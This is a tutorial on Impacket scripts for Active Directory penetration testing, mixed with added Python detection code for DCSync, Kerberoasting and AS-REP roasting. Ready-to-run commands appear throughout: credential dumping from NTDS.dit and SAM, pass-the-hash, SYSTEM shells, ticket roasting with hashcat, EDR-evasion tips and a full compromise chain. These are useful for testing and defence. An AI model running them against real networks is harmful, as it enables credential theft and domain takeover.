Impacket is a collection of Python classes for working with network protocols, and it has become one of the most essential toolkits for Active Directory penetration testing. Developed by Fortra (formerly SecureAuth), it provides low-level access to SMB, Kerberos, LDAP, and other Windows protocols. This guide covers the most commonly used scripts during AD engagements with real command examples.
Installation
Via pip (recommended for latest version)
pip3 install impacket
From source (for development or the absolute latest commits)
git clone https://github.com/fortra/impacket.git
cd impacket
pip3 install -r requirements.txt
pip3 install .
On Kali Linux
Impacket scripts are pre-installed. Access them directly by name:
secretsdump.py --help
psexec.py --help
If not found, they’re typically in /usr/share/doc/python3-impacket/examples/ or installed system-wide after pip3 install impacket.
Authentication Options
Most Impacket scripts share a common authentication syntax:
DOMAIN/username:password@target
With a password hash (pass-the-hash):
DOMAIN/username@target -hashes LMHash:NTHash
With Kerberos (after obtaining a ticket):
-k -no-pass
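To make the two syntaxes concrete, here is an added example written for this guide (my own code, not Impacket's; the helper names parse_target, parse_hashes and nt_hash are hypothetical) that splits a target string the way the scripts do, validates a -hashes value, and computes an NT hash from a password. The NT hash is an unsalted MD4 of the UTF-16LE password, which is exactly why a stolen hash is a password equivalent: the value 8846f7eaee8fb117ad06bdd830b7586c used in the pass-the-hash commands in this guide is simply the NT hash of "password".

```python
import re
import struct

# Added example for this guide: parse_target, parse_hashes and nt_hash are
# hypothetical helper names written here, not Impacket's own API.

# [[DOMAIN/]username[:password]@]target, the form shared by most scripts
_TARGET_RE = re.compile(r"^(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)$")

# LM hash stored for every account on hosts where LM hashing is disabled
# (it is the LM hash of the empty password)
EMPTY_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"

_MASK = 0xFFFFFFFF


def parse_target(target):
    """Split 'DOMAIN/user:password@host' into (domain, user, password, host);
    absent parts come back as empty strings."""
    domain, user, password, host = _TARGET_RE.match(target).groups()
    if not host:
        raise ValueError("target host is missing: %r" % target)
    return domain or "", user or "", password or "", host


def parse_hashes(hashes):
    """Validate a -hashes value. Format is LMHash:NTHash; either half may be
    empty (':NTHash' is the usual pass-the-hash form), never a third field."""
    parts = hashes.split(":")
    if len(parts) != 2:
        raise ValueError("-hashes expects exactly LMHash:NTHash, got %r" % hashes)
    lm, nt = (p.lower() for p in parts)
    for name, value in (("LM", lm), ("NT", nt)):
        if value and not re.fullmatch(r"[0-9a-f]{32}", value):
            raise ValueError("%s hash must be 32 hex characters: %r" % (name, value))
    return lm, nt


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data):
    """Pure-Python MD4 (RFC 1320). Included because OpenSSL 3 builds of
    hashlib frequently no longer expose md4 at all."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):  # round 1: F, message words in order
            a = _rotl((a + F(b, c, d) + X[i]) & _MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G, words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & _MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H, words 0,8,4,12,2,10,...
            k = (0, 2, 1, 3)[i // 4] + (0, 8, 4, 12)[i % 4]
            a = _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & _MASK, (B + b) & _MASK, (C + c) & _MASK, (D + d) & _MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)), with no salt: the same password gives
    the same hash on every host, which is what makes pass-the-hash possible."""
    return md4(password.encode("utf-16-le")).hex()


if __name__ == "__main__":
    print(parse_target("DOMAIN/Administrator:Password123@192.168.1.10"))
    print(parse_hashes(":8846f7eaee8fb117ad06bdd830b7586c"))
    print(nt_hash("password"))
```

Because the hash is unsalted and the MD4 is fast, two accounts sharing a password share a hash, and a cracked NT hash from one host is immediately usable everywhere that account exists; that is the property a defender is reducing by enforcing long unique passwords, disabling NTLM where feasible, and keeping privileged accounts out of the Protected Users gap.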
secretsdump.py is the star of the toolkit. It can dump credentials from SAM, LSA secrets, NTDS.dit, and DPAPI blobs.
Remote Dump via SMB
With local admin credentials on a Windows machine:
secretsdump.py DOMAIN/Administrator:Password123@192.168.1.10
With a password hash (pass-the-hash):
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c \
DOMAIN/Administrator@192.168.1.10
Dumping NTDS.dit from a Domain Controller
This dumps all domain hashes — the crown jewels of an AD engagement:
secretsdump.py DOMAIN/Administrator:Password123@dc01.domain.local -just-dc-ntlm
The -just-dc-ntlm flag extracts only the NTLM hashes from NTDS.dit, skipping the Kerberos keys and DPAPI secrets, so you get just the NT hashes you need for pass-the-hash or cracking.
Offline NTDS.dit Analysis
If you’ve already copied NTDS.dit and SYSTEM from a DC:
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
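What the remote NTDS dump looks like from the DC's side: secretsdump.py's default remote mode does not copy ntds.dit, it asks the DC for the account data over the Directory Replication Service RPC interface (DRSUAPI), the same mechanism known as DCSync. The DC therefore logs a 4662 directory-service access event carrying the replication control-access rights. The detection below is an added example written for this guide (not Impacket code, and not a production rule); the key=value event lines are constructed, simplified samples, and the MSOL_PLACEHOLDER allowlist entry stands in for a legitimate replication account such as the one Azure AD Connect uses.

```python
import re

# Added example for this guide: a DCSync-style detection over constructed
# 4662 events. Not Impacket code, not a production rule.

# Extended rights a DC checks before serving a replication (GetNCChanges)
# request. These three GUIDs are the real Active Directory identifiers.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit for an extended-right (control access) check

# Constructed 4662 samples flattened to key=value pairs. The last Properties
# value uses a placeholder attribute GUID, not a real schema identifier.
SAMPLE_4662 = [
    "EventID=4662 SubjectUserName=DC02$ SubjectDomainName=DOMAIN SubjectLogonId=0x3e7 "
    "ObjectType=domainDNS AccessMask=0x100 "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=Administrator SubjectDomainName=DOMAIN SubjectLogonId=0x5a1c2 "
    "ObjectType=domainDNS AccessMask=0x100 "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=MSOL_PLACEHOLDER SubjectDomainName=DOMAIN SubjectLogonId=0x7b33 "
    "ObjectType=domainDNS AccessMask=0x100 "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=jsmith SubjectDomainName=DOMAIN SubjectLogonId=0x8c41 "
    "ObjectType=user AccessMask=0x10 "
    "Properties={aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}",
]


def parse_event(line):
    """key=value tokens; tokens without '=' continue the previous value
    (Properties lists several GUIDs separated by spaces)."""
    fields, key = {}, None
    for tok in line.split():
        if "=" in tok:
            key, val = tok.split("=", 1)
            fields[key] = val
        elif key is not None:
            fields[key] += " " + tok
    return fields


def detect_dcsync(lines, allowlist=frozenset()):
    """Return (subject, logon_id, [right names]) for every 4662 event in which a
    non-DC principal exercised a replication right."""
    hits = []
    for ev in map(parse_event, lines):
        if ev.get("EventID") != "4662":
            continue
        if int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS == 0:
            continue
        guids = set(re.findall(r"[0-9a-f-]{36}", ev.get("Properties", "").lower()))
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids & REPLICATION_RIGHTS.keys())
        if not rights:
            continue
        subject = ev.get("SubjectUserName", "")
        # Simplification: treat any machine account as a DC. A stricter rule
        # resolves the subject against the Domain Controllers group instead,
        # because ordinary computer accounts should never replicate either.
        if subject.endswith("$") or subject in allowlist:
            continue
        hits.append((subject, ev.get("SubjectLogonId", ""), rights))
    return hits


if __name__ == "__main__":
    for subject, logon_id, rights in detect_dcsync(SAMPLE_4662, {"MSOL_PLACEHOLDER"}):
        print("replication by %s (logon %s): %s" % (subject, logon_id, ", ".join(rights)))
```

Two prerequisites for this to fire at all: "Audit Directory Service Access" must be enabled on the DCs, and the domain object needs a SACL entry auditing control-access operations, otherwise no 4662 is written. The SubjectLogonId is what you join against the matching 4624 event to recover the source address the request came from.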
psexec.py — Remote Command Execution
psexec.py implements the PsExec technique: it uploads a service binary over SMB and executes it, giving you a SYSTEM shell.
psexec.py DOMAIN/Administrator:Password123@192.168.1.10
With a hash:
psexec.py -hashes :8846f7eaee8fb117ad06bdd830b7586c \
DOMAIN/Administrator@192.168.1.10
You’ll land in a SYSTEM shell:
Microsoft Windows [Version 10.0.19041.1415]
C:\Windows\system32>whoami
nt authority\system
Note: psexec.py is noisy. It creates a service and drops a binary to disk, which is flagged by most EDR products. Use wmiexec.py or smbexec.py for stealthier execution.
wmiexec.py — Stealthier Remote Execution
wmiexec.py uses WMI to execute commands, running them in-memory without dropping a binary to disk (mostly):
wmiexec.py DOMAIN/Administrator:Password123@192.168.1.10
You get a semi-interactive shell. Run specific commands:
wmiexec.py DOMAIN/Administrator:Password123@192.168.1.10 "whoami"
wmiexec.py DOMAIN/Administrator:Password123@192.168.1.10 "net localgroup administrators"
smbclient.py — SMB Share Enumeration
Browse and interact with SMB shares:
smbclient.py DOMAIN/user:Password123@192.168.1.10
Within the interactive shell:
# shares — list available shares
# use C$ — connect to C$ share
# ls — list files
# get filename — download a file
# put filename — upload a file
List shares without an interactive session by feeding the mini shell a command file:
echo shares > cmds.txt
smbclient.py DOMAIN/user:Password123@192.168.1.10 -inputfile cmds.txt
GetUserSPNs.py — Kerberoasting
Kerberoasting extracts Kerberos service tickets for accounts with Service Principal Names (SPNs), then cracks them offline. Any domain user can request these tickets.
Step 1: Find Kerberoastable Accounts
GetUserSPNs.py DOMAIN/user:Password123 -dc-ip 192.168.1.1
Output shows accounts and their SPNs:
ServicePrincipalName               Name        MemberOf
---------------------------------  ----------  ------------
HTTP/webserver.domain.local:80     websvc      Domain Users
MSSQLSvc/sql01.domain.local:1433   sqlservice  Domain Users
Step 2: Request Service Tickets
GetUserSPNs.py DOMAIN/user:Password123 -dc-ip 192.168.1.1 -request -outputfile kerberoast_hashes.txt
Step 3: Crack Offline with Hashcat
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt
Mode 13100 is for Kerberos 5 TGS-REP etype 23 (RC4). If you capture etype 18 (AES256), use mode 19700.
GetNPUsers.py — AS-REP Roasting
AS-REP roasting targets accounts with “Do not require Kerberos preauthentication” set. No credentials needed:
GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip 192.168.1.1 -no-pass -format hashcat -outputfile asrep_hashes.txt
Crack the resulting hash:
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
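For the defender's side of both Kerberoasting and AS-REP roasting, here is an added example written for this guide (not part of Impacket) that runs over constructed Windows Security events in key=value form: 4769 service-ticket requests and 4768 TGT requests. It flags RC4 (etype 0x17) service tickets issued for user-account SPNs, a single source address collecting tickets for many SPN accounts at once (the footprint of -request), and successful TGT requests with PreAuthType 0, which is what an account with pre-authentication disabled produces. The event lines, addresses and account names are constructed samples.

```python
from collections import defaultdict

# Added example for this guide: Kerberoast / AS-REP roast detection over
# constructed 4769 and 4768 events. Not Impacket code, not a production rule.

RC4_HMAC = "0x17"  # etype 23, the hashcat 13100 / 18200 case

# Constructed samples. 4769: TargetUserName is the requester, ServiceName the
# SPN account. 4768: TargetUserName is the account the TGT is for.
SAMPLE_EVENTS = [
    "EventID=4769 TargetUserName=user@DOMAIN.LOCAL ServiceName=sqlservice TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.77 Status=0x0",
    "EventID=4769 TargetUserName=user@DOMAIN.LOCAL ServiceName=websvc TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.77 Status=0x0",
    "EventID=4769 TargetUserName=user@DOMAIN.LOCAL ServiceName=svc_reports TicketEncryptionType=0x12 IpAddress=::ffff:192.168.1.77 Status=0x0",
    "EventID=4769 TargetUserName=user@DOMAIN.LOCAL ServiceName=WS01$ TicketEncryptionType=0x12 IpAddress=::ffff:192.168.1.77 Status=0x0",
    "EventID=4769 TargetUserName=jsmith@DOMAIN.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:192.168.1.80 Status=0x0",
    "EventID=4769 TargetUserName=jsmith@DOMAIN.LOCAL ServiceName=svc_backup TicketEncryptionType=0x12 IpAddress=::ffff:192.168.1.80 Status=0x0",
    "EventID=4768 TargetUserName=svc_legacy ServiceName=krbtgt PreAuthType=0 TicketEncryptionType=0x17 IpAddress=::ffff:192.168.1.77 Status=0x0",
    "EventID=4768 TargetUserName=jsmith ServiceName=krbtgt PreAuthType=2 TicketEncryptionType=0x12 IpAddress=::ffff:192.168.1.80 Status=0x0",
    "EventID=4768 TargetUserName=nosuchuser ServiceName=krbtgt PreAuthType=- TicketEncryptionType=0xffffffff IpAddress=::ffff:192.168.1.77 Status=0x6",
]


def parse_event(line):
    """Turn 'k=v k=v ...' into a dict (values here contain no spaces)."""
    return dict(tok.split("=", 1) for tok in line.split() if "=" in tok)


def detect_kerberoasting(events, bulk_threshold=5):
    """Alerts as (rule, source_ip, requester, detail). Computer accounts ($) and
    krbtgt are skipped: roastable SPNs live on user accounts."""
    alerts = []
    services_by_source = defaultdict(set)
    for ev in map(parse_event, events):
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue
        svc = ev.get("ServiceName", "")
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        src = ev.get("IpAddress", "?")
        services_by_source[src].add(svc)  # AES tickets count here too: they are crackable, just slower
        if ev.get("TicketEncryptionType", "").lower() == RC4_HMAC:
            alerts.append(("rc4_tgs_for_user_spn", src, ev.get("TargetUserName"), svc))
    for src, svcs in sorted(services_by_source.items()):
        if len(svcs) >= bulk_threshold:
            alerts.append(("bulk_tgs_requests", src, None, "%d distinct SPN accounts" % len(svcs)))
    return alerts


def detect_asrep_roasting(events):
    """Successful TGT issuance with PreAuthType 0: the AS-REP handed back is
    encrypted with the account's key and can be cracked offline."""
    alerts = []
    for ev in map(parse_event, events):
        if ev.get("EventID") != "4768" or ev.get("Status") != "0x0":
            continue
        if ev.get("PreAuthType") == "0":
            alerts.append(("asrep_without_preauth", ev.get("IpAddress"),
                           ev.get("TargetUserName"), ev.get("TicketEncryptionType")))
    return alerts


if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_EVENTS, bulk_threshold=3) + detect_asrep_roasting(SAMPLE_EVENTS):
        print(alert)
```

The thresholds are placeholders to tune against your own baseline, since monitoring tools and service accounts legitimately request tickets to several SPNs. The fixes are on the account side: long random passwords or group managed service accounts for anything holding an SPN, removing the "do not require pre-authentication" flag, and dropping RC4 from msDS-SupportedEncryptionTypes where nothing still depends on it. The failed 4768 with Status 0x6 in the samples is what an unknown username in a -usersfile produces; a burst of those from one address is worth its own rule.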
lookupsid.py — User Enumeration Without Auth
Enumerate domain users via SID brute-forcing (works with null sessions or guest access):
lookupsid.py DOMAIN/guest:@192.168.1.10
samrdump.py — User and Group Enumeration
Dump users and groups via the SAMR protocol:
samrdump.py DOMAIN/user:Password123@192.168.1.10
Practical Attack Chain Example
A typical Impacket-assisted AD compromise chain:
- Get initial access (phishing, exposed service, weak creds)
- Enumerate SPNs: GetUserSPNs.py → crack hashes → escalate to service account
- Lateral movement: wmiexec.py to other machines with cracked credentials
- Reach a DC: secretsdump.py -just-dc-ntlm to dump all domain hashes
- Create persistence: pass-the-hash with domain admin NT hash
Impacket scripts are staples on OSCP, CRTO, and real-world engagements. Understanding what each script does at the protocol level makes you a better defender as much as a better attacker — knowing how Kerberoasting works is the first step to detecting it.